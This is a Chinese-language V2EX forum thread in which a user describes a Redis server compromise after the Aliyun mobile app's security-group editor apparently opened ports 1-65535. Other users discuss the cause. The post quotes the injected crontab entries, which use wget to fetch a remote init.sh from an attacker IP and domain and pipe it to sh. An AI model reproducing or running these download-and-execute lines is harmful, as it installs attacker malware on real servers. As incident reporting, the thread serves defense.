阿里云手机 App 上的一个操作导致我的服务器被入侵

2021-02-01 20:03:32 +08:00
 lerry
事情是这样, 刚才发现我的一个服务挂了,仔细检查发现是 redis 问题,
我勒个去,我所有的 key 都没了,只剩下 backup1 - backup12 这十二个 key,内容略有不同,大致是下边这样

\n\n\n*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | sh\n\n
\n\n\n*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | sh\n\n

怎么会这样,平时只开必要的端口,6379 是绝对不开的

时间回到 1 个小时前,我新跑了一个服务,需要打开 tcp 端口 12345,我拿出手机,打开阿里云,操作安全组,开端口,一气呵成。




咦?怎么不行?原来程序需要的是 tcp 端口,我设置成了 udp 。找到新增的一条规则,把 udp 改成 tcp,确定,O 了,搞定





经过就是这样,看出问题了吗?以上过程均可复现

被入侵,我想过很多种可能,却没想到这一种

到现在我也没找到阿里云的安全组操作日志在哪里
6110 次点击
所在节点    云计算
31 条回复
saytesnake
2021-02-02 08:55:37 +08:00
@learningman

阿里云上我反而不担心这问题,有安全组配置,不过我没用过 APP,手机上弄这个不太好感觉。

目前非一堆微服务的单体应用已经慢慢转成 Podman 了,非 root 启动搭配上 systemd 很舒适。
tankren
2021-02-02 10:38:58 +08:00
redis 开放是根本原因 不过你可以提交“bug”给 APP 组啊
lopetver
2021-02-02 10:49:00 +08:00
@matrix67 https://www.cnblogs.com/intbjw/p/14326312.html

存在横向移动的,赶紧修复为主
lopetver
2021-02-02 11:07:08 +08:00
![image.png]( https://i.loli.net/2021/02/02/boLIRqUsmBvjXer.png)

截止回复时还有 4 个旷工在线呢,算力最高达 450KH
lerry
2021-02-02 13:40:58 +08:00
@yzbythesea #19 自己的程序,不是公司业务,家里没有固定 ip,现在改用 zerotier,不开放公网防火墙了
@PerFectTime #16
@learningman #17 受教
cnleon
2021-02-02 14:16:58 +08:00
自己开放 1-65535,这还能怪别人?
lozt
2021-02-02 16:39:17 +08:00
@cnleon 其实我也想问…第二张图…是表示端口全开了吧😶
lerry
2021-02-02 17:35:29 +08:00
@lozt #25 是的,本来设置的 udp 12345,把 udp 改成 tcp,端口自己变成 1-65535 了,你不觉得这 App 的行为有问题吗
Mithril
2021-02-02 17:58:44 +08:00
@lerry 阿里的东西习惯就好了,又不是没告你变成了 1-65535 。。。
markgor
2021-02-05 14:06:38 +08:00
搞运维要形成 double check 的习惯,
就算是平常操作,配置完后还是要检查一遍才放心。

但如果说的是 app 体验度,我觉得端口这给位置,default 应该是空的,提示是 1-65535,且必填。
someonedeng
2021-03-24 10:31:45 +08:00
主要还是没密码

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://tanronggui.xyz/t/750410

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX